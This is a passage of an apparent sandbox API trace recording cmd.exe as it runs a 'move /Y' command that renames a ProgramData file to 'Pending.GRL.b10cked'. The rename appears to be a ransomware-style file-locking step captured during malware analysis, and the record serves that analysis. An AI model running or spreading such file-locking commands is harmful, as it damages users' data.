RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.127] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f994, dwLength=0x1c | out: lpBuffer=0x24f994*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0152.127] GetConsoleOutputCP () returned 0x1b5 [0152.127] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.128] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0152.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.128] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0152.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.128] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.128] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.128] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.128] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.128] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.128] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.128] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0152.129] GetEnvironmentStringsW () returned 0x420178* [0152.129] FreeEnvironmentStringsW (penv=0x420178) returned 1 [0152.129] GetEnvironmentStringsW () returned 0x420178* [0152.129] FreeEnvironmentStringsW (penv=0x420178) returned 1 
[0152.129] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e934 | out: phkResult=0x24e934*=0x40) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0xa0, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x0, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x4) returned 0x0 [0152.129] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegCloseKey (hKey=0x40) returned 0x0 [0152.130] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e934 | out: phkResult=0x24e934*=0x40) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x40, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x1, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x0, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x9, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x4, lpData=0x24e940*=0x9, lpcbData=0x24e938*=0x4) returned 0x0 [0152.130] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e93c, lpData=0x24e940, lpcbData=0x24e938*=0x1000 | out: lpType=0x24e93c*=0x0, lpData=0x24e940*=0x9, lpcbData=0x24e938*=0x1000) returned 0x2 [0152.130] RegCloseKey (hKey=0x40) returned 0x0 [0152.130] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0152.130] srand (_Seed=0x5b88637a) [0152.130] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"" [0152.130] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked\"" [0152.130] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.131] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0152.131] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.131] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.131] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.131] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0152.131] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0152.131] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0152.131] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0152.131] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0152.131] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0152.131] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0152.131] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0152.131] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0152.131] GetEnvironmentStringsW () returned 0x4222c8* [0152.131] 
FreeEnvironmentStringsW (penv=0x4222c8) returned 1 [0152.131] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.131] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.131] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0152.131] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0152.131] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0152.132] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0152.132] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0152.132] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0152.132] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0152.132] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.132] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.132] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f700, lpFilePart=0x24f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f6fc*="Desktop") returned 0x18 [0152.132] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.132] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f47c | out: lpFindFileData=0x24f47c) returned 0x420008 [0152.132] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0152.132] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f47c | out: lpFindFileData=0x24f47c) returned 0x420008 [0152.132] FindClose (in: hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0152.132] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f47c | out: lpFindFileData=0x24f47c) returned 0x420008 [0152.133] FindClose (in: 
hFindFile=0x420008 | out: hFindFile=0x420008) returned 1 [0152.133] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.133] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.133] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.133] GetEnvironmentStringsW () returned 0x422ae8* [0152.133] FreeEnvironmentStringsW (penv=0x422ae8) returned 1 [0152.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.134] GetConsoleOutputCP () returned 0x1b5 [0152.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.134] GetUserDefaultLCID () returned 0x409 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f840, cchData=128 | out: lpLCData="0") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f840, cchData=128 | out: lpLCData="0") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f840, cchData=128 | out: lpLCData="1") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.134] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.135] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.135] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.138] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.138] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.139] GetConsoleTitleW (in: lpConsoleTitle=0x4108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.139] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.139] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.139] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.140] _wcsicmp (_String1="move", _String2=")") returned 68 [0152.140] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0152.140] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0152.140] _wcsicmp (_String1="IF", _String2="move") returned -4 [0152.140] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0152.140] _wcsicmp (_String1="REM", _String2="move") returned 5 [0152.140] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0152.146] GetConsoleTitleW (in: lpConsoleTitle=0x24f538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.146] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0152.146] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0152.146] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0152.146] 
_wcsicmp (_String1="move", _String2="TYPE") returned -7 [0152.147] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="CD") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="REN") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0152.147] _wcsicmp (_String1="move", _String2="SET") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0152.147] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0152.147] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0152.147] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0152.147] _wcsicmp (_String1="move", _String2="MD") returned 11 [0152.147] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0152.147] _wcsicmp (_String1="move", _String2="RD") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0152.147] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0152.147] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0152.147] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0152.147] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0152.147] _wcsicmp (_String1="move", _String2="VER") returned -9 [0152.147] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0152.147] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0152.147] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0152.147] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0152.147] _wcsicmp (_String1="move", _String2="START") returned -6 [0152.147] _wcsicmp (_String1="move", _String2="DPATH") 
returned 9 [0152.147] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0152.147] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0152.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.149] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0152.149] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f2f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f2ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f2ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", 
_MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0152.150] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0152.151] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0152.151] _wcsicmp (_String1="Pending.GRL", _String2=".") returned 66 [0152.151] _wcsicmp (_String1="Pending.GRL", _String2="..") returned 66 [0152.151] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl")) returned 0x20 [0152.151] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x421d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.151] SetErrorMode (uMode=0x0) returned 0x0 [0152.151] SetErrorMode (uMode=0x1) returned 0x0 [0152.151] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", nBufferLength=0x104, lpBuffer=0x24ec7c, lpFilePart=0x24ec64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", lpFilePart=0x24ec64*="Pending.GRL") returned 0x29 [0152.151] SetErrorMode (uMode=0x0) returned 0x1 [0152.151] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF" (normalized: "c:\\users\\alluse~1\\micros~1\\mf")) returned 0x2012 [0152.152] _wcsicmp (_String1="Pending.GRL", _String2=".") returned 66 [0152.152] _wcsicmp (_String1="Pending.GRL", _String2="..") returned 66 [0152.152] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl")) returned 0x20 [0152.152] SetErrorMode (uMode=0x0) returned 0x0 [0152.152] SetErrorMode (uMode=0x1) returned 0x0 [0152.152] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", nBufferLength=0x104, lpBuffer=0x24f0f8, lpFilePart=0x24ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", lpFilePart=0x24ee90*="Pending.GRL") returned 0x29 [0152.152] SetErrorMode (uMode=0x0) returned 0x1 [0152.152] SetErrorMode (uMode=0x0) returned 0x0 [0152.152] SetErrorMode (uMode=0x1) returned 0x0 [0152.152] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x24f300, lpFilePart=0x24ee90 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", lpFilePart=0x24ee90*="Pending.GRL.b10cked") returned 0x31 [0152.152] SetErrorMode (uMode=0x0) returned 0x1 [0152.152] SetLastError (dwErrCode=0x0) [0152.152] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~1\\mf\\pending.grl.b10cked")) returned 0xffffffff [0152.152] GetLastError () returned 0x2 [0152.152] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", fInfoLevelId=0x1, lpFindFileData=0x24e80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e80c) returned 0x410f20 [0152.153] FindNextFileW (in: hFindFile=0x410f20, lpFindFileData=0x24e80c | out: lpFindFileData=0x24e80c) returned 0 [0152.153] GetLastError () returned 0x12 [0152.153] FindClose (in: hFindFile=0x410f20 | out: hFindFile=0x410f20) returned 1 [0152.154] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", fInfoLevelId=0x1, lpFindFileData=0x421af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x421af0) returned 0x410f20 [0152.155] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", nBufferLength=0x104, lpBuffer=0x24eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked", lpFilePart=0x0) returned 0x31 [0152.155] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", nBufferLength=0x104, lpBuffer=0x24eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL", lpFilePart=0x0) returned 0x29 [0152.155] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl")) returned 0x20 [0152.155] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\Pending.GRL.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\mf\\pending.grl.b10cked"), dwFlags=0x3) returned 1 [0152.155] FindClose (in: hFindFile=0x410f20 | out: hFindFile=0x410f20) returned 1 [0152.155] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, 
_Format="%9d", _ArgList=0x24ea58 | out: _Buffer=" 1") returned 9 [0152.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.155] GetFileType (hFile=0x7) returned 0x2 [0152.250] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.250] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24e9e4 | out: lpMode=0x24e9e4) returned 1 [0152.250] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.250] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ea18 | out: lpConsoleScreenBufferInfo=0x24ea18) returned 1 [0152.250] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0152.251] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ea58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0152.251] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ea3c*=0x1a) returned 1 [0152.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.251] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.251] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.251] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0152.251] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.251] GetConsoleMode (in: hConsoleHandle=0x3, 